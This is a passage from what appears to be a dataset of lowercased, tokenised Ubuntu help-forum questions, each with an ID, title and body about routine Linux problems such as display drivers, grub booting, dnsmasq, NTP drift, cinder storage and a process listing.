6.8.1-5build2 x.org x server -- ati r128 display driver ii xserver-xorg-video-radeon 1:6.14.99~git20111219.aacbd629-0ubuntu2 x.org x server -- amd/ati radeon display driver ii xserver-xorg-video-s3 1:0.6.3-4build2 x.org x server -- legacy s3 display driver ii xserver-xorg-video-savage 1:2.3.3-1ubuntu1 x.org x server -- savage display driver ii xserver-xorg-video-siliconmotion 1:1.7.5-1build2 x.org x server -- siliconmotion display driver ii xserver-xorg-video-sis 1:0.10.3-3build2 x.org x server -- sis display driver ii xserver-xorg-video-sisusb 1:0.9.4-2build2 x.org x server -- sis usb display driver ii xserver-xorg-video-tdfx 1:1.4.3-4build2 x.org x server -- tdfx display driver ii xserver-xorg-video-trident 1:1.3.4-2build2 x.org x server -- trident display driver ii xserver-xorg-video-vesa 1:2.3.0-7build2 x.org x server -- vesa display driver result from lshw -c video command : *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:50 memory : dd000000-dd3fffff memory : c0000000-cfffffff ioport : e000 ( size=64 ) question what is actually my problem ? why approximately in before i can use 3d and now can not ? how to get back my ubuntu 3d session ?
499117	how can i get an ubuntu laptop to talk to a xen server ?	i have an ubuntu laptop running xenmanager and i can not get it to talk to the server . i 've gotten error 111 connection refused when typing in the host/ip address and port number . does anyone how i can make this work ?
499118	i would like to make a virtual router on ubuntu 14.04	i have ubuntu 14.04 . but when i try to create a virtual router from the `` create new wireless network '' i lose connection . this issue was resolved in the forum , in the following post : i would like to make a virtual router on ubuntu 12.04 i tried all steps on the old forum with similar problem , but when i run : sudo hostapd hostapd.conf i get this : configuration file : hostapd.conf could not open configuration file 'hostapd.conf ' for reading . failed to set up interface with hostapd.conf failed to initialize interface the data from my network card : 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 08 ) subsystem : hewlett-packard company device [ 103c:2165 ] kernel driver in use : r8169 perhaps for this new version need an additional driver ? thanks for your time .
499121	grub2 can not see my new external usb hard drive , but sees an older one	i am trying to boot ubuntu-studio ( current version ) from a new seagate 2tb expansion usb drive on an old system ( pc ) whose bios does n't know how to boot from usb . no problems with either the install or running from the livecd in general . i used gparted from a livecd session to partition the drive and then installed ubuntu to it and everything ended up where i expected . i set up a grub boot cd without a config , just to run it interactive for starters , intending to set up a scenario where i can boot the usb from grub cd initialization . when i am at the grub prompt from the rescue cd i do 'ls ' to list known devices and grub sees my internal drive , floppy and cd drives and an older external maxtor usb drive , but does not report the new seagate usb drive or another older usb dvd writer . i have tried unplugging all usb devices , except the seagate , and it is still not reported by grub . obviously , i ca n't boot from what i ca n't point to . after booting into either winxp ( original system ) or with the ubuntu livecd , the seagate drive is fully visible , writable , mountable , etc.. any ideas on why grub ca n't see it and how to make it visible to grub ? especially note that grub can see a different usb hard drive on the same system .
499124	dnsmasq problem on ubuntu 14.04	this is my first post , so please forgive me if this has been already answered . i already searched but i cant find any solution . my problem is i cant make ap-hotspot to work properly , i am using 14.04 . when i was using 13.10 , everything was fine . the problem is dnsmasq . when i try to install ap-hotspot , it says dnsmasq is not installed . then i tried installing dnsmasq but it says : package dnsmasq is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : dnsmasq-base e : package 'dnsmasq ' has no installation candidate im done with the hostapd thing , the only problem is the dnsmasq .
499129	i am unable to install any software in ubuntu 14.04	hi i am a newbiee to ubuntu 14.04 i got a red alret mark on my tool bar and then i am unbale to install any software plz hem me urgent ? ?
499131	how to use more than 255 loop devices	i have in mind there is a maximum of 255 loop devices on one system . is there a way to use more than 255 loop devices at once on one system ?
499134	mysql broken package on xubuntu 14.04	installing lamp on xubuntu today with apt-get install lamp-server^ , i got the following error : e : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server-core-5.5_5.5.38-0ubuntu0.14.04.1_amd64.deb hash sum mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i 've tried apt-get -f install . i 've tried the answer recommended here : mysql broken packages what should i try next ?
499137	key mismatch in vi editor	i have installed ubuntu 14.04 lts in my acer laptop . all the functions are working except vi editor . when i try to enter some text using vi editor , the responces are mismatching . for example when i press up arrow it takes it as 'b ' . but when i enter some text in libra office and trrminal , it works perfectly . pls help me . i wil be happy if you do so . thanks for ur response .
499138	dns resolution conflict in 12.04	i ping host1 in my first terminal , it exits with 0 ( success ) . then in a separate terminal i ping an unknown host ( which fails ) and it makes the first ping fails as well ! here is my best shot at demonstrating the problem : note that the first ping will fail for about 15 seconds . note also that this does n't happen for just any hostname . google.com for example works fine . the host that fails is in the local network ( 10.* ) . it 's probably a dns misconfiguration somewhere but i just ca n't figure out how to debug that thing .
499149	is there any reason to use 'kill ' instead of 'killall'/'pkill ' ?	starting my adventure with linux a couple of years back , most tutorials and older , more experienced colleagues suggested using the command 'kill ' , sort of like a replacement for the process manager from windows for a convert . but i also got ( not sure if correctly ) a sense of pro smugness about this command . however , based on my own inquires i soon stared to use the 'killall ' function , as i always had a problem with pids . however i just now learned that there is also a command 'pkill ' , which basically does the same thing . also i learned that the proper way to use 'kill ' is to use 'ps -a | grep ... ' . but is n't this procedure exactly the same thing as just using 'pkill ' , or 'killall ' ? ( i 've read what 's the difference between 'killall ' and 'pkill ' ? , so i know that those 2 are a little different . ) why use kill at all , when we still have to do the identification : name of the process - > pid in order to use 'kill ' ?
499150	last.fm webapp needs flash for playing . ubuntu default webbrowser does n't seem to support flash	i 'm trying to use the last.fm webapp but it says that flash needs to be installed . i have installed the flash player and it works from firefox & chromium . any ideas on why the new default ubuntu browser does n't support flash ?
499153	is there any calculator in software centre which could solve quadratic equations ?	i want good scientific calculator which can calculate the roots of any quadratic equation just by entering the quadratic equation first of all is any app like those there in ubuntu software centre ? ?
499154	screencloud tray icon disappeared , already installed libqt4-svg	i was messing around with a lot of programs and files last night trying to get some things to work . then , when i turned my computer on this morning , i noticed that my screencloud tray icon had disappeared . screencloud still works , but instead of opening up a dialogue box after taking a screenshot like i set it to , it automatically uploads the picture and shows a little message from the top-left corner of the screen . i looked at other similar questions and saw that the people were missing libqt4-svg , but i not only already had that installed but also reinstalled it to see if that would fix it , but it was to no avail . the problem may have something to do with the messing around i was doing last night since when i first turned it on my background was messed up too , but i was able to fix that . any help would be greatly appreciated !
499155	juju install error : could n't connect to host	i 'm trying to install juju on maas ubuntu 12.04.04 . i get the following error : - root @ ubuntu : ~ # sudo add-apt-repository ppa : juju/stable traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 128 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 84 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 7 , `` could n't connect to host '' ) root @ ubuntu : ~ # i have tried setting proxy in /etc/apt/apt.conf as well as setting http_proxyenvironment variable . i 'm able to download any packages from internet though e.g . vim etc . please let me know what i may be missing here .
499158	my ext hhd is read-only ! posted attempts to correct same confused me and made matters worst !	i am using ubuntu 14 lts . i am having issues using my verbatim 1tb external hhd . it keeps mounting as read-only ! . i can use it in windows but when i attempt to load anything on it in ubuntu it will not permit . yes ! i have read just about every post on the internet and caused more harm then good . i tired to follow efforts to correct the same under other trends but i ended up only making my internal hdd read only and was forced to reformat and reload the os ! i need help and i need help in layman 's term . i do not understand alot of the terms so please somebody walk me by the hand to correct this problem before i toss my computer and ubuntu out the window ! thus far tired the recommended : sudo mount -o remount , uid=1000 , gid=1000 , rw /dev/sdc1 got : mount : ca n't find /dev/sdc1 in /etc/fstab or /etc/mtab then tired : unplug your external hard disk . cd /etc sudo cp fstab fstab.bak this takes a backup of the file we 're about to edit . sudo nano fstab this opens up the fstab file in a text editor . move the blinking cursor to the end of the file , and paste the following two lines # line for mounting the external drive uuid=d04a-0ae4 /media/verbatimhdd exfat rw , uid=1000 , gid=1000 , user , exec , umask=003 , blksize=4096 0 0 â again nothing still only read-only .
499160	boot goes straight into windows 7 after installing ubuntu , how do i get back into ubuntu and get the option of either at start up ?	i installed ubuntu 14.04 from a dvd ( all the files were there ) onto my hp laptop . it used to be windows 8 but a friend of mine put windows 7 on it instead so secure boot and fast boot are disabled . ubuntu installed but now on start up it goes straight to windows . i do n't know how to get back onto ubuntu as if i leave the dvd in the options are to `` install ubuntu , try demo ( something like that ) , oem for manufacturers or exit . '' i saw articles on here about fixing this from the ubuntu terminal but if i ca n't get ubuntu to load ( because i tried the solution in the demo and it did n't work . ) how do i go about this ? literally spent last 4 hours trying to figure this out and i 'm sure i 'm coming across as a total noob but any help would be much appreciated .
499164	slapd - tls not working / apparmor errors	i 've been trying to get ldap working and set up for a few days now . the real head scratcher is that everything went fine until i got to the point of setting up tls . i was using this guide from the official ubuntu documentation site . doing this produced a really high number of errors that resulted in slapd not being able to restart . most of the errors had to do with apparmor not allowing permissions to parts of the computer , but one error in particular kept coming back around . tls init def ctx failed : -1 completely stumped !
499166	quick re-logging with command-line	is there a command-line or script that re-logs your current user ? logging out is : gnome-session-quit -- no-prompt then i just need to type my password to relog . is there a way to do it as root without using a password ?
499167	what is the recommended way to run more than 2 monitors in ubuntu ?	after quite a bit of trial and error , i have gotten 3 monitors running in 14.04 using an active displayport-to-hdmi adapter , a dvi and an hdmi . however , upon rebooting my system i often have to fiddle with the display settings ( disable the displayport screen and re-enable it , lower the resolution and bring it back up , etc ) in order to get an image on my displayport screen . a lot of times the resolution on only the displayport screen will be really low and when i attempt to adjust it , the only options available are incredibly low ( eg 640x480 ) . occasionally that screen will have a full 1080p resolution but appear blurry/flickery . sometimes it works , sometimes it does n't ; when it does n't i reboot and try again and it eventually works . something of note is that the screen in question always works perfectly during boot . i 've done quite a bit of research online on this issue , and i do n't think it is a driver issue . from what i can tell , it seems like maybe the card is n't sending a strong enough signal to the screen connected to the displayport adapter , but i thought the active adapter took care of that . i then thought maybe it was because i did n't have enough video memory or power , so i upgraded and installed 2x ati 280x 's in crossfire ( 6gb total memory ) and a 1000w psu , but i 'm still plagued by the same problem . i 'm looking to add a 4th monitor to the equation , and it just seems like a nightmare to set up this way . is there a more reliable/better way to run a bunch of screens in ubuntu ?
499168	server time drift not fixed by ntp.conf	this question was asked a lot in the past , but since ntpdate has been depricated , i 'm having issues finding answers that work via ntp.conf . i 've read a lot about setting a cron job for ntpdate is a bad idea now , so that answer wo n't work for me . my server time ( ubuntu 14.04 server ) is drifting quite a bit , and i have a time server i 'm using locally . in my ntp.conf file i have my server listed like this server 192.168.1.25 iburst burst minpoll 4 maxpoll 4 despite these settings the watchdog timer run from ntpdc -c loopinfo never resets and my drift keeps getting larger and larger . to sum up my question , why is n't my /etc/ntp.conf file actually doing anything ? more info : this is a ubuntu 14.04 vm running on hypver-v and is used as a redmine server . output of ntpq -p ( not sure if typo , but no q option ) remote refid st t when poll reach delay offset jitter =================================================================================== myother.server 192.168.1.26 2 u 2 16 377 0.607 0.808 4691.46
499171	problems with installing ubuntu from usb	i deleted the ubuntu partition that i had in my computer , grub is gone so i ca n't access windows . to fix that i tried to reinstall ubuntu using a usb , but i only get a boot error message . i think the usb is fine since i 've tried it with my laptop and it loaded the ubuntu installer . i do n't know if i made an error when i deleted the partition . when i first installed ubuntu in that computer i did using the same usb . my computer is a dell inspiron 530 .
499177	no sound from speakers on ubuntu 14.04	i 've this problem ... once , when i restart a pc the sound goes mute and i do n't know how to fix it : ( there 's my sound card ( from list of lspci ) : audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) i 've tried apt-get install update & & apt-get install upgrade & & apt-get install pulseaudio* , but nothing work : ( please help me : ) ) thanks for every answer ; ) ( sounds work on my windows 7 which i 've with dualboot and my pc is lenovo ideapad s10e ( netbook ) )
499181	how to correctly configure cinder charm to use loopback device for storage ?	i am using the cinder charm ( cs : trusty/cinder-4 ) and am trying to deploy on a machine with only a single disk . what 's the right way to specify using a loopback file ? based on examples i have seen , i am putting block-device : `` /srv/cinder.data|750g '' in a config file . however , when i try to create a volume in cinder , i get an error . the cinder logs indicate the volume group can not be found . when i ssh into the machine , i can see that the file gets created , and is the right size , but the loopback device and volume group have not been created ( verified by running `` losetup -a '' and `` vgs '' ) root @ 4fwa3 : ~ # vgs no volume groups found the only thing resembling an error in /var/log/juju/unit-cinder-0.log on the machine running cinder is : 2014-07-17 19:02:06 info config-changed no physical volume label read from /dev/loop0 2014-07-17 19:02:06 info config-changed failed to read physical volume `` /dev/loop0 '' config files : /etc/cinder/cinder.conf ( written by juju ) : [ default ] . . volume_group = cinder-volumes config file used when running `` juju deploy cinder -- config=openstack.cfg '' : cinder : openstack-origin : cloud : trusty-icehouse block-device : `` /srv/cinder.data|750g '' overwrite : âtrueâ
499182	kernel 3.13.0.32 fan rpms greatly increased	i have just updated the kernel from 3.13.0-30 to 3.13.0-32 for ubuntu 14.04 that has all `` stable '' updates . as soon as i rebooted ( several times ) the two computer fans went from the average 1400 rpm to 1800 to 2000 rpm . i booted up a previously dd 'd version of the same 14.04 configuration ( backup ) running kernel 3.13.0-30 and the fans went down to the average 1400 rpm . any ideas on what may be happening ? intel core i7 cpu 920 @ 2.67 ghz x 8 64 bit 4 gig ram update : i rebooted with the 3.13.0-30 kernel and both fans calmed down , reduced rms to 1400 average or less . celcius temperature indicators are in normal range with no alarms . i reinstalled the 3.13.0-32 kernel before that and that did not help . fan rpms up , temperature indicators up , and several alarms .
499183	ubuntu 13.10 end of support	13.10 ends support today , i want to do a clean install of 14.04.1 , but it arrives next week , is it highly risk to wait fot 14.04.1 one week with 13.10 no supported ? thanks .
499185	how to completely change keyboard layout	i was wondering if i could completely remap the en ( canada ) keyboard to input runes instead of latin characters on ubuntu 14.04 lts .
499186	nautilus hidpi support ?	i have a lenovo yoga pro 2 with a 3200x1800 screen . i 've got most of the system working with hidpi , but nautilus is still really tiny . what can i do to make it usable ?
499189	how to check if some program is already installed and its version ?	i 'm exploring working with the ubuntu terminal . for particular reason i need to check if i have installed python interpreter , like cpython . how to do it ? in general , how to check if some program is already installed and its version ?
499191	i do not know how to install drivers on wifi	i need help installing drivers for my belkin f9l1108tg usb adapter.i dont know much about my os.i have a dell 3000.i have current drivers for windows but dont know how to install . bus 001 device 006 : id 050d:110a belkin components bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 413c:2003 dell computer corp . keyboard bus 002 device 002 : id 046d : c016 logitech , inc. optical wheel mouse bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
499192	ubunut 12.04 freezes after yesterday 's hardware package update ?	i have a dual-boot ubuntu 12.04/win8 system running an nvidia geforce gtx 580 graphics card . all worked beautifully until today , doing the first boot after the ubuntu update yesterday regarding a hardware package of some sort ( i recall seeing `` hwi '' in the update ) . now the system freezes after i log in and i eventually get a black screen of death saying `` nouveau e [ gpu lockup - switching to software fbcon '' . i suspect this may be something related to the graphics card and the hardware package update ( but i have n't been using linux that long , so i could easily be wrong . ) if i use the recovery boot option , with the `` continue '' option , the system runs properly except that the graphics are lower-resolution and the `` displays '' tool only shows a `` laptop '' display . does anyone know what this might be , or how to restore the previous system functionality ? thanks much !
499193	software center and ppa not working	i am new to ubuntu , just today i was trying to download a program with a ppa , crebs , and it did not work ; not only that , the software center does n't work either , and i ca n't get it from the internet to reinstall . here 's the error message that i get in the terminal : software-center 2014-07-17 14:56:40,835 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-07-17 14:56:41,230 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-07-17 14:56:41,233 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-07-17 14:56:41,238 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-07-17 14:56:41,238 - root - error - could not find any typelib for launchpadintegration 2014-07-17 14:56:41,283 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2014-07-17 14:56:41,712 - softwarecenter.backend.reviews - warning - error creating bsddb : ' ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) ' ( corrupted ? ) 2014-07-17 14:56:41,712 - softwarecenter.backend.reviews - error - trying to repair db failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 358 , in _save_review_stats_cache_blocking self._dump_bsddbm_for_unity ( outfile , outdir ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 377 , in _dump_bsddbm_for_unity 0600 ) dbinvalidargerror : ( 22 , 'invalid argument -- bdb0054 illegal flag combination specified to db_env- > open ' ) /usr/lib/python2.7/dist-packages/gi/overrides/glib.py:535 : warning : source id 68 was not found when attempting to remove it return super ( maincontext , self ) .iteration ( may_block ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 151 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . 2014-07-17 14:56:43,162 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1378 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1316 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 227 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 326 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 121 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 255 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 240 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' any idea , anyone ?
499194	unable to create working installation media for ubuntu	i have tried to burn versions 12.4 lts , and version 14.04 lts to a dvd and the last time it said the disk was verified , but when i open the discs there is nothing burned on them . the image for 14.04 lts is too big to burn on a 700mb cd data disc , and i ca n't seem to get it into a dvd . i have the 12.04.1 lts disc that i had burned 2 years ago , it worked fine on several desktops , but it does n't work on my laptop . it installs but with errors and the programs wo n't start right . for some reason none of the iso file downloads will work or burn on any of my laptops or desktops now . i have tried it on 5 altogether . any ideas how to solve this issue ?
499195	error message `` ? ? ? '' in ubiquity	i 've got ? ? ? error message in ubiquity at country choices . see screenshot below :
499196	where can i find the newest version of chromium browser for arm ?	does anyone make builds of the chromium browser for the arm architecture ? the available version in the repos is version 28 while the newest stable version is v36 . i understand there are no offical builds but before i started working on my own i wanted th check if any where available
499197	ubuntu 12.04 disable shutdown under the guest account	we have several computers used by the public , hence they use the guest account in 12.04 . is there a way to disable the 'shutdown ' computer option as these computers are behind lock and key and if a guest chooses to shutdown , we have to unlock a cabinet to start them again . so eliminating the 'shutdown ' option for the guest account would be ideal .
499199	application icon disappears from ubuntu launcher	i checked the forum topics and tried various suggested solutions but none worked to resolve this issue . os : ubuntu 12.04 : accounts : administrator ( administrator ) , resource ( standard ) wine : 1.4 windows software : office 2003 installed on resource account task : put word & excel application icons on the unity launcher . procedure : open the dashboard scroll down `` installed '' applications to the word & excel application icons . drag the icon over to the launcher . beautiful . launch word from the launcher . works great ! problem : the icon sticks to the launcher until i log out or reboot . when logging back in to the resource account , the word & excel icons disappear from the launcher . question : how do i get the word icon to stick to the launcher ? on another ubuntu installation ( essentially identical but obviously not ) , the icon sticks . i really do n't know where to look .
499200	xdg-open opens chrome but does not load the url	`` xdg-open http : //www.google.ca '' in a command line opens my default browser ( google-chrome ) but does not load the url . if i change my default browser to firefox the url loads just fine . any ideas ? i 'm running 14.04 .
499202	hadoop execstack problem	this is my first post ever , so forgive me if this is in the wrong place . i am using hadoop 2.4.1 on ubuntu 14.04 , and i just set up rhadoop ( rmr2 and rhdfs ) . however i keep receiving this warning when i run hadoop : it 's highly recommended that you fix the library with 'execstack -c < libfile > ' , or link it with '-z noexecstack ' . i 've searched everywhere and can not figure out what this means , let alone how to fix it . i should add that this also happens when i try to run anything in rhadoop other than library ( rmr2 ) and library ( rhdfs ) .
499204	visual problems on ubuntu with gnome flashback	i installed ubuntu 14.04 lts . visuals were very very slow so i installed gnome flashback . now speed is ok , but things like icons and pictures , vanish . sometimes if i move the mouse or the scroll wheel tyhings appear again , sometimes not . its very annoying . my pc : amd sempron 2800+ , 1gb ram , geforce 4 64mb . is there a solution for this ?
499208	black screen after installing hardware support	i 'm using ubuntu 12.04.4 lts on my vmware player . update manager popped up this morning with a bunch of updates and i installed them and restarted the os - i did n't face any problems at all . but i remembered that the update manager said `` new hardware support is available '' on the top , and had a button to install the `` hardware support '' . so i started update manager again and saw the same message and button . i clicked on that button and after it installed , i restarted the os using the `` restart now '' button . upon restart , the login screen showed up , and after i logged in by entering my password , the screen became completely black . i waited for several minutes , but nothing happened . after a bit of searching the internet , i came to know that i can access the terminal from the login screen itself , so i restarted ubuntu by resetting vmware player and when the login screen came up , i clicked ctrl + alt + f1 and a terminal program came up on the screen . i am unsure as to what i should do now . please help . by the way , i just remembered - when i clicked on the install button for the hardware support , i saw a message that said that some graphics thing is no longer going to be maintained starting 8/7/2014 and a new graphics driver or something is the new hardware support .
499212	how to install gnome videos ( new gnome video playing app , formerly totem )	how do i install this ( http : //www.omgubuntu.co.uk/2014/03/top-12-features-gnome-3-12 ) new gnome videos app ?
499221	add sugsetions to an alias	when you press tab 2 times you get suggestions for possible commands . for example lstabtab will print all available commands . is it possible to add such suggestions to an alias that is user created ? if so , how ?
499222	how do i change the default icon size of smooth tasks plasma taskbar ?	by default the icons are completely square , so while i can make them wider , that has the effect of making them taller . i want to perfectly emulate the windows 7 taskbar , but changing the space between the buttons does n't have the effect i want . i know it is capable of changing their width , the `` grow at attention '' ( pun not intended ) is proof of that , i just want to know how i can make it about 2/3 as tall as it is wide .
499223	general error mounting filesystems . new to linux	my laptop was recently pushed off my bed , which is about three feet off the ground . when i tried to restart it , i got a screen that said '' general error mounting filesystems . a maintnence shell will now be started . control-d will terminate this shell and reboot the system . root @ rober-hp-pavilion-dv9700-notebook-pc : ~ # '' i have gotten as far as that screen , before i can no longer go on , as it does not change the screen or text at all . i am new to linux , and have absoultly no idea as what to do right now .
499225	what is the difference between green and red mac addresses in wavemon 's scan list ?	in wavemon , what does red vs. green mean for the mac addresses in the scan list ? for example : the wavemon man page says : scan window ( f3 ) ... each entry starts with the essid , followed by the colour-coded mac address and the signal/channel information . a green/red mac address indicates an ( un- ) encrypted access point , the colour changes to yellow for non-access points ... but from that i ca n't tell what the difference between red and green is , only red/green vs. yellow .
499228	creating power group	i want to create a group that can run some privileged commands but not all . for example , a power user can access the home files ( from one user to another ) , but it should n't be allowed to run apt-get command . how can i accomplish that ?
499230	xubuntu ( server install ) screen blanks for 1 second after 1 minute	little hard to understand the question from the title , but i 'll get detailed here . after exactly 60 seconds of init starting and the system booting , the screen will seem to `` restart '' , blanking out for a little less than a second and resetting my brightness to maximum after re-showing the desktop . this does not require anybody to have logged in , but it wo n't stop if they do . the system is ubuntu server 14.04 with xubuntu-desktop installed without recommends . i had to install quite a bit of software after the no-recommends installation of xubuntu , so i could be missing some files . i ran ps aux before it happended and i do see 2 sleep 60 in there . i 've attached the entire output of ps aux below . what program is causing this ? can i disable it ? it is not ruining any part of the system , more of an annoyance than anything . edit 1 : i 've removed the previous ps aux output because i am running out of room , but here is the output of ps -ef . it shows the parents of both sleeps . i am more concerned about the one being run by root , for if i do not log in , it will not know to run the second one as me , and as stated before , it happens regardless of me logging in . what is in this /etc/init.d/ondemand file ? that is below the output of ps -ef . look under the `` background '' case . i am unsure of what exactly is causing the screen flicker , or if this file is required to run or not . output of ps -ef before flicker : uid pid ppid c stime tty time cmd root 1 0 6 21:56 ? 00:00:02 /sbin/init root 2 0 0 21:56 ? 00:00:00 [ kthreadd ] root 3 2 0 21:56 ? 00:00:00 [ ksoftirqd/0 ] root 4 2 0 21:56 ? 00:00:00 [ kworker/0:0 ] root 5 2 0 21:56 ? 00:00:00 [ kworker/0:0h ] root 6 2 0 21:56 ? 00:00:00 [ kworker/u4:0 ] root 7 2 0 21:56 ? 00:00:00 [ rcu_sched ] root 8 2 0 21:56 ? 00:00:00 [ rcuos/0 ] root 9 2 0 21:56 ? 00:00:00 [ rcuos/1 ] root 10 2 0 21:56 ? 00:00:00 [ rcu_bh ] root 11 2 0 21:56 ? 00:00:00 [ rcuob/0 ] root 12 2 0 21:56 ? 00:00:00 [ rcuob/1 ] root 13 2 0 21:56 ? 00:00:00 [ migration/0 ] root 14 2 0 21:56 ? 00:00:00 [ watchdog/0 ] root 15 2 0 21:56 ? 00:00:00 [ watchdog/1 ] root 16 2 2 21:56 ? 00:00:01 [ migration/1 ] root 17 2 0 21:56 ? 00:00:00 [ ksoftirqd/1 ] root 18 2 0 21:56 ? 00:00:00 [ kworker/1:0 ] root 19 2 0 21:56 ? 00:00:00 [ kworker/1:0h ] root 20 2 0 21:56 ? 00:00:00 [ khelper ] root 21 2 0 21:56 ? 00:00:00 [ kdevtmpfs ] root 22 2 0 21:56 ? 00:00:00 [ netns ] root 23 2 0 21:56 ? 00:00:00 [ writeback ] root 24 2 0 21:56 ? 00:00:00 [ kintegrityd ] root 25 2 0 21:56 ? 00:00:00 [ bioset ] root 26 2 0 21:56 ? 00:00:00 [ kworker/u5:0 ] root 27 2 0 21:56 ? 00:00:00 [ kblockd ] root 28 2 0 21:56 ? 00:00:00 [ ata_sff ] root 29 2 0 21:56 ? 00:00:00 [ khubd ] root 30 2 0 21:56 ? 00:00:00 [ md ] root 31 2 0 21:56 ? 00:00:00 [ devfreq_wq ] root 32 2 0 21:56 ? 00:00:00 [ kworker/0:1 ] root 33 2 0 21:56 ? 00:00:00 [ kworker/1:1 ] root 34 2 0 21:56 ? 00:00:00 [ khungtaskd ] root 35 2 0 21:56 ? 00:00:00 [ kswapd0 ] root 36 2 0 21:56 ? 00:00:00 [ ksmd ] root 37 2 0 21:56 ? 00:00:00 [ khugepaged ] root 38 2 0 21:56 ? 00:00:00 [ fsnotify_mark ] root 39 2 0 21:56 ? 00:00:00 [ ecryptfs-kthrea ] root 40 2 0 21:56 ? 00:00:00 [ crypto ] root 52 2 0 21:56 ? 00:00:00 [ kthrotld ] root 53 2 0 21:56 ? 00:00:00 [ kworker/u4:1 ] root 54 2 0 21:56 ? 00:00:00 [ kworker/u4:2 ] root 73 2 0 21:56 ? 00:00:00 [ deferwq ] root 74 2 0 21:56 ? 00:00:00 [ charger_manager ] root 75 2 0 21:56 ? 00:00:00 [ kworker/0:2 ] root 76 2 0 21:56 ? 00:00:00 [ kworker/0:3 ] root 122 2 0 21:56 ? 00:00:00 [ kpsmoused ] root 123 2 0 21:56 ? 00:00:00 [ scsi_eh_0 ] root 125 2 0 21:56 ? 00:00:00 [ scsi_eh_1 ] root 126 2 0 21:56 ? 00:00:00 [ scsi_eh_2 ] root 127 2 0 21:56 ? 00:00:00 [ scsi_eh_3 ] root 129 2 0 21:56 ? 00:00:00 [ scsi_eh_4 ] root 130 2 0 21:56 ? 00:00:00 [ scsi_eh_5 ] root 131 2 0 21:56 ? 00:00:00 [ kworker/u4:3 ] root 132 2 0 21:56 